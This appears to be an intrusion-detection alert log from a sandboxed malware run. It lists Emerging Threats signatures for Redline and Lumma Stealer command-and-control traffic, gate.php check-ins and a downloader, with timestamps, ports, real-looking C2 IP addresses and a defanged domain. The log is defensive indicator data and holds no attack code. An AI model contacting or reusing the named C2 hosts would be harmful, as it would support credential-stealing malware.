2024-12-12T16:49:38.318334+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50080	185.81.68.147	80	TCP
2024-12-12T16:49:40.224291+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50085	185.81.68.147	80	TCP
2024-12-12T16:49:42.123906+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50091	185.81.68.147	80	TCP
2024-12-12T16:49:43.896529+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50104	185.81.68.147	80	TCP
2024-12-12T16:49:45.761525+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50120	185.81.68.147	80	TCP
2024-12-12T16:49:47.592431+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50124	185.81.68.147	80	TCP
2024-12-12T16:49:49.279394+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50127	185.81.68.147	80	TCP
2024-12-12T16:49:51.229821+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50128	185.81.68.147	80	TCP
2024-12-12T16:49:53.073352+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50131	185.81.68.147	80	TCP
2024-12-12T16:49:55.009969+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50134	185.81.68.147	80	TCP
2024-12-12T16:49:56.698622+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50136	185.81.68.147	80	TCP
2024-12-12T16:49:58.579931+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50139	185.81.68.147	80	TCP
2024-12-12T16:50:00.279337+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50141	185.81.68.147	80	TCP
2024-12-12T16:50:02.307286+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50146	185.81.68.147	80	TCP
2024-12-12T16:50:04.012827+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50148	185.81.68.147	80	TCP
2024-12-12T16:50:04.214882+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50147	185.81.68.147	80	TCP
2024-12-12T16:50:04.464069+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50150	185.81.68.147	80	TCP
2024-12-12T16:50:06.015974+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50156	185.81.68.147	80	TCP
2024-12-12T16:50:08.068063+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50165	185.81.68.147	80	TCP
2024-12-12T16:50:08.956599+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50164	185.81.68.147	80	TCP
2024-12-12T16:50:09.269536+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50174	185.81.68.147	80	TCP
2024-12-12T16:50:09.904036+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50176	185.81.68.147	80	TCP
2024-12-12T16:50:11.742161+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50182	185.81.68.147	80	TCP
2024-12-12T16:50:13.465562+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50184	185.81.68.147	80	TCP
2024-12-12T16:50:15.152143+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50192	185.81.68.147	80	TCP
2024-12-12T16:50:17.071221+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50195	185.81.68.147	80	TCP
2024-12-12T16:50:19.044987+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50196	185.81.68.147	80	TCP
2024-12-12T16:50:20.988187+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50202	185.81.68.147	80	TCP
2024-12-12T16:50:22.890926+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50207	185.81.68.147	80	TCP
2024-12-12T16:50:24.882642+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50221	185.81.68.147	80	TCP
2024-12-12T16:50:26.627266+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50233	185.81.68.147	80	TCP
2024-12-12T16:50:28.320557+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50243	185.81.68.147	80	TCP
2024-12-12T16:50:30.297076+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50254	185.81.68.147	80	TCP
2024-12-12T16:50:32.183845+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50258	185.81.68.147	80	TCP
2024-12-12T16:50:34.064096+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50261	185.81.68.147	80	TCP
2024-12-12T16:50:35.876600+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50265	185.81.68.147	80	TCP
2024-12-12T16:50:37.750819+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50268	185.81.68.147	80	TCP
2024-12-12T16:50:39.704101+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50272	185.81.68.147	80	TCP
2024-12-12T16:50:41.581306+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50275	185.81.68.147	80	TCP
2024-12-12T16:50:43.584964+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50288	185.81.68.147	80	TCP
2024-12-12T16:50:45.346981+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50294	185.81.68.147	80	TCP
2024-12-12T16:50:47.034246+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50296	185.81.68.147	80	TCP
2024-12-12T16:50:48.854420+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50300	185.81.68.147	80	TCP
2024-12-12T16:50:50.537748+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50302	185.81.68.147	80	TCP
2024-12-12T16:50:52.370878+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50311	185.81.68.147	80	TCP
2024-12-12T16:50:54.079049+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50316	185.81.68.147	80	TCP
2024-12-12T16:50:55.996365+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50319	185.81.68.147	80	TCP
2024-12-12T16:50:57.999225+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50329	185.81.68.147	80	TCP
2024-12-12T16:50:59.837977+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50330	185.81.68.147	80	TCP
2024-12-12T16:51:01.617885+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50332	185.81.68.147	80	TCP
2024-12-12T16:51:07.739107+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50337	185.81.68.147	80	TCP
2024-12-12T16:51:09.658808+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50339	185.81.68.147	80	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:50:29.760539+0100	2054653	1	A Network Trojan was detected	192.168.2.10	50238	172.67.213.48	443	TCP
2024-12-12T16:50:34.198263+0100	2054653	1	A Network Trojan was detected	192.168.2.10	50259	172.67.213.48	443	TCP
2024-12-12T16:50:52.876874+0100	2054653	1	A Network Trojan was detected	192.168.2.10	50308	172.67.213.48	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:50:29.760539+0100	2049836	1	A Network Trojan was detected	192.168.2.10	50238	172.67.213.48	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:50:34.198263+0100	2049812	1	A Network Trojan was detected	192.168.2.10	50259	172.67.213.48	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:50:28.617180+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.10	50238	172.67.213.48	443	TCP
2024-12-12T16:50:33.485834+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.10	50259	172.67.213.48	443	TCP
2024-12-12T16:50:35.808854+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.10	50263	172.67.213.48	443	TCP
2024-12-12T16:50:37.870851+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.10	50267	172.67.213.48	443	TCP
2024-12-12T16:50:40.450539+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.10	50271	172.67.213.48	443	TCP
2024-12-12T16:50:43.338354+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.10	50284	172.67.213.48	443	TCP
2024-12-12T16:50:49.617379+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.10	50299	172.67.213.48	443	TCP
2024-12-12T16:50:52.161845+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.10	50308	172.67.213.48	443	TCP

ET MALWARE Redline Stealer TCP CnC - Id1Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:57.758591+0100	2043234	1	A Network Trojan was detected	185.81.68.147	1912	192.168.2.10	49987	TCP

ET MALWARE Redline Stealer TCP CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:57.323492+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:02.860674+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:03.835156+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:04.588176+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:05.941811+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:06.524367+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:07.098867+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:09.311065+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:09.751202+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:10.283805+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:10.734934+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:11.728022+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:12.169561+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:12.607750+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:13.048307+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:13.603022+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:13.758647+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:14.210076+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:14.648312+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:15.084665+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:15.555208+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:16.095366+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:16.215903+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:17.575686+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:18.012627+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP
2024-12-12T16:49:18.518179+0100	2043231	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:03.298149+0100	2046056	1	A Network Trojan was detected	185.81.68.147	1912	192.168.2.10	49987	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:42.321382+0100	2019714	2	Potentially Bad Traffic	192.168.2.10	49946	185.81.68.147	80	TCP
2024-12-12T16:48:55.965003+0100	2019714	2	Potentially Bad Traffic	192.168.2.10	49983	185.81.68.147	80	TCP

ET MALWARE Trojan Generic - POST To gate.php with no accept headers

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:37.185345+0100	2022985	1	A Network Trojan was detected	192.168.2.10	49933	185.81.68.147	80	TCP
2024-12-12T16:48:37.429929+0100	2022985	1	A Network Trojan was detected	192.168.2.10	49938	185.81.68.147	80	TCP
2024-12-12T16:48:39.209260+0100	2022985	1	A Network Trojan was detected	192.168.2.10	49943	185.81.68.147	80	TCP
2024-12-12T16:48:57.805054+0100	2022985	1	A Network Trojan was detected	192.168.2.10	49989	185.81.68.147	80	TCP
2024-12-12T16:48:58.053827+0100	2022985	1	A Network Trojan was detected	192.168.2.10	49996	185.81.68.147	80	TCP
2024-12-12T16:49:00.539654+0100	2022985	1	A Network Trojan was detected	192.168.2.10	49998	185.81.68.147	80	TCP
2024-12-12T16:49:00.782649+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50008	185.81.68.147	80	TCP
2024-12-12T16:49:01.392290+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50011	185.81.68.147	80	TCP
2024-12-12T16:49:03.271064+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50017	185.81.68.147	80	TCP
2024-12-12T16:49:05.207591+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50021	185.81.68.147	80	TCP
2024-12-12T16:49:07.246330+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50030	185.81.68.147	80	TCP
2024-12-12T16:49:08.908525+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50034	185.81.68.147	80	TCP
2024-12-12T16:49:10.703399+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50036	185.81.68.147	80	TCP
2024-12-12T16:49:12.687511+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50038	185.81.68.147	80	TCP
2024-12-12T16:49:14.392460+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50040	185.81.68.147	80	TCP
2024-12-12T16:49:16.046870+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50041	185.81.68.147	80	TCP
2024-12-12T16:49:17.891832+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50043	185.81.68.147	80	TCP
2024-12-12T16:49:19.946252+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50045	185.81.68.147	80	TCP
2024-12-12T16:49:22.019394+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50048	185.81.68.147	80	TCP
2024-12-12T16:49:23.947453+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50050	185.81.68.147	80	TCP
2024-12-12T16:49:25.845097+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50060	185.81.68.147	80	TCP
2024-12-12T16:49:27.692012+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50061	185.81.68.147	80	TCP
2024-12-12T16:49:29.585615+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50064	185.81.68.147	80	TCP
2024-12-12T16:49:32.035333+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50067	185.81.68.147	80	TCP
2024-12-12T16:49:32.277224+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50068	185.81.68.147	80	TCP
2024-12-12T16:49:32.570048+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50070	185.81.68.147	80	TCP
2024-12-12T16:49:34.388673+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50071	185.81.68.147	80	TCP
2024-12-12T16:49:36.018645+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50072	185.81.68.147	80	TCP
2024-12-12T16:49:36.259903+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50075	185.81.68.147	80	TCP
2024-12-12T16:49:36.271923+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50076	185.81.68.147	80	TCP
2024-12-12T16:49:38.318334+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50080	185.81.68.147	80	TCP
2024-12-12T16:49:40.224291+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50085	185.81.68.147	80	TCP
2024-12-12T16:49:42.123906+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50091	185.81.68.147	80	TCP
2024-12-12T16:49:43.896529+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50104	185.81.68.147	80	TCP
2024-12-12T16:49:45.761525+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50120	185.81.68.147	80	TCP
2024-12-12T16:49:47.592431+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50124	185.81.68.147	80	TCP
2024-12-12T16:49:49.279394+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50127	185.81.68.147	80	TCP
2024-12-12T16:49:51.229821+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50128	185.81.68.147	80	TCP
2024-12-12T16:49:53.073352+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50131	185.81.68.147	80	TCP
2024-12-12T16:49:55.009969+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50134	185.81.68.147	80	TCP
2024-12-12T16:49:56.698622+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50136	185.81.68.147	80	TCP
2024-12-12T16:49:58.579931+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50139	185.81.68.147	80	TCP
2024-12-12T16:50:00.279337+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50141	185.81.68.147	80	TCP
2024-12-12T16:50:02.307286+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50146	185.81.68.147	80	TCP
2024-12-12T16:50:04.012827+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50148	185.81.68.147	80	TCP
2024-12-12T16:50:04.214882+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50147	185.81.68.147	80	TCP
2024-12-12T16:50:04.464069+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50150	185.81.68.147	80	TCP
2024-12-12T16:50:06.015974+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50156	185.81.68.147	80	TCP
2024-12-12T16:50:08.068063+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50165	185.81.68.147	80	TCP
2024-12-12T16:50:08.956599+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50164	185.81.68.147	80	TCP
2024-12-12T16:50:09.269536+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50174	185.81.68.147	80	TCP
2024-12-12T16:50:09.904036+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50176	185.81.68.147	80	TCP
2024-12-12T16:50:11.742161+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50182	185.81.68.147	80	TCP
2024-12-12T16:50:13.465562+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50184	185.81.68.147	80	TCP
2024-12-12T16:50:15.152143+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50192	185.81.68.147	80	TCP
2024-12-12T16:50:17.071221+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50195	185.81.68.147	80	TCP
2024-12-12T16:50:19.044987+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50196	185.81.68.147	80	TCP
2024-12-12T16:50:20.988187+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50202	185.81.68.147	80	TCP
2024-12-12T16:50:22.890926+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50207	185.81.68.147	80	TCP
2024-12-12T16:50:24.882642+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50221	185.81.68.147	80	TCP
2024-12-12T16:50:26.627266+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50233	185.81.68.147	80	TCP
2024-12-12T16:50:28.320557+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50243	185.81.68.147	80	TCP
2024-12-12T16:50:30.297076+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50254	185.81.68.147	80	TCP
2024-12-12T16:50:32.183845+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50258	185.81.68.147	80	TCP
2024-12-12T16:50:34.064096+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50261	185.81.68.147	80	TCP
2024-12-12T16:50:35.876600+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50265	185.81.68.147	80	TCP
2024-12-12T16:50:37.750819+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50268	185.81.68.147	80	TCP
2024-12-12T16:50:39.704101+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50272	185.81.68.147	80	TCP
2024-12-12T16:50:41.581306+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50275	185.81.68.147	80	TCP
2024-12-12T16:50:43.584964+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50288	185.81.68.147	80	TCP
2024-12-12T16:50:45.346981+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50294	185.81.68.147	80	TCP
2024-12-12T16:50:47.034246+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50296	185.81.68.147	80	TCP
2024-12-12T16:50:48.854420+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50300	185.81.68.147	80	TCP
2024-12-12T16:50:50.537748+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50302	185.81.68.147	80	TCP
2024-12-12T16:50:52.370878+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50311	185.81.68.147	80	TCP
2024-12-12T16:50:54.079049+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50316	185.81.68.147	80	TCP
2024-12-12T16:50:55.996365+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50319	185.81.68.147	80	TCP
2024-12-12T16:50:57.999225+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50329	185.81.68.147	80	TCP
2024-12-12T16:50:59.837977+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50330	185.81.68.147	80	TCP
2024-12-12T16:51:01.617885+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50332	185.81.68.147	80	TCP
2024-12-12T16:51:07.739107+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50337	185.81.68.147	80	TCP
2024-12-12T16:51:09.658808+0100	2022985	1	A Network Trojan was detected	192.168.2.10	50339	185.81.68.147	80	TCP

ET MALWARE Trojan Generic - POST To gate.php with no referer

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:37.185345+0100	2017930	1	A Network Trojan was detected	192.168.2.10	49933	185.81.68.147	80	TCP
2024-12-12T16:48:37.429929+0100	2017930	1	A Network Trojan was detected	192.168.2.10	49938	185.81.68.147	80	TCP
2024-12-12T16:48:39.209260+0100	2017930	1	A Network Trojan was detected	192.168.2.10	49943	185.81.68.147	80	TCP
2024-12-12T16:48:57.805054+0100	2017930	1	A Network Trojan was detected	192.168.2.10	49989	185.81.68.147	80	TCP
2024-12-12T16:48:58.053827+0100	2017930	1	A Network Trojan was detected	192.168.2.10	49996	185.81.68.147	80	TCP
2024-12-12T16:49:00.539654+0100	2017930	1	A Network Trojan was detected	192.168.2.10	49998	185.81.68.147	80	TCP
2024-12-12T16:49:00.782649+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50008	185.81.68.147	80	TCP
2024-12-12T16:49:01.392290+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50011	185.81.68.147	80	TCP
2024-12-12T16:49:03.271064+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50017	185.81.68.147	80	TCP
2024-12-12T16:49:05.207591+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50021	185.81.68.147	80	TCP
2024-12-12T16:49:07.246330+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50030	185.81.68.147	80	TCP
2024-12-12T16:49:08.908525+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50034	185.81.68.147	80	TCP
2024-12-12T16:49:10.703399+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50036	185.81.68.147	80	TCP
2024-12-12T16:49:12.687511+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50038	185.81.68.147	80	TCP
2024-12-12T16:49:14.392460+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50040	185.81.68.147	80	TCP
2024-12-12T16:49:16.046870+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50041	185.81.68.147	80	TCP
2024-12-12T16:49:17.891832+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50043	185.81.68.147	80	TCP
2024-12-12T16:49:19.946252+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50045	185.81.68.147	80	TCP
2024-12-12T16:49:22.019394+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50048	185.81.68.147	80	TCP
2024-12-12T16:49:23.947453+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50050	185.81.68.147	80	TCP
2024-12-12T16:49:25.845097+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50060	185.81.68.147	80	TCP
2024-12-12T16:49:27.692012+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50061	185.81.68.147	80	TCP
2024-12-12T16:49:29.585615+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50064	185.81.68.147	80	TCP
2024-12-12T16:49:32.035333+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50067	185.81.68.147	80	TCP
2024-12-12T16:49:32.277224+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50068	185.81.68.147	80	TCP
2024-12-12T16:49:32.570048+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50070	185.81.68.147	80	TCP
2024-12-12T16:49:34.388673+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50071	185.81.68.147	80	TCP
2024-12-12T16:49:36.018645+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50072	185.81.68.147	80	TCP
2024-12-12T16:49:36.259903+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50075	185.81.68.147	80	TCP
2024-12-12T16:49:36.271923+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50076	185.81.68.147	80	TCP
2024-12-12T16:49:38.318334+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50080	185.81.68.147	80	TCP
2024-12-12T16:49:40.224291+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50085	185.81.68.147	80	TCP
2024-12-12T16:49:42.123906+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50091	185.81.68.147	80	TCP
2024-12-12T16:49:43.896529+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50104	185.81.68.147	80	TCP
2024-12-12T16:49:45.761525+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50120	185.81.68.147	80	TCP
2024-12-12T16:49:47.592431+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50124	185.81.68.147	80	TCP
2024-12-12T16:49:49.279394+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50127	185.81.68.147	80	TCP
2024-12-12T16:49:51.229821+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50128	185.81.68.147	80	TCP
2024-12-12T16:49:53.073352+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50131	185.81.68.147	80	TCP
2024-12-12T16:49:55.009969+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50134	185.81.68.147	80	TCP
2024-12-12T16:49:56.698622+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50136	185.81.68.147	80	TCP
2024-12-12T16:49:58.579931+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50139	185.81.68.147	80	TCP
2024-12-12T16:50:00.279337+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50141	185.81.68.147	80	TCP
2024-12-12T16:50:02.307286+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50146	185.81.68.147	80	TCP
2024-12-12T16:50:04.012827+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50148	185.81.68.147	80	TCP
2024-12-12T16:50:04.214882+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50147	185.81.68.147	80	TCP
2024-12-12T16:50:04.464069+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50150	185.81.68.147	80	TCP
2024-12-12T16:50:06.015974+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50156	185.81.68.147	80	TCP
2024-12-12T16:50:08.068063+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50165	185.81.68.147	80	TCP
2024-12-12T16:50:08.956599+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50164	185.81.68.147	80	TCP
2024-12-12T16:50:09.269536+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50174	185.81.68.147	80	TCP
2024-12-12T16:50:09.904036+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50176	185.81.68.147	80	TCP
2024-12-12T16:50:11.742161+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50182	185.81.68.147	80	TCP
2024-12-12T16:50:13.465562+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50184	185.81.68.147	80	TCP
2024-12-12T16:50:15.152143+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50192	185.81.68.147	80	TCP
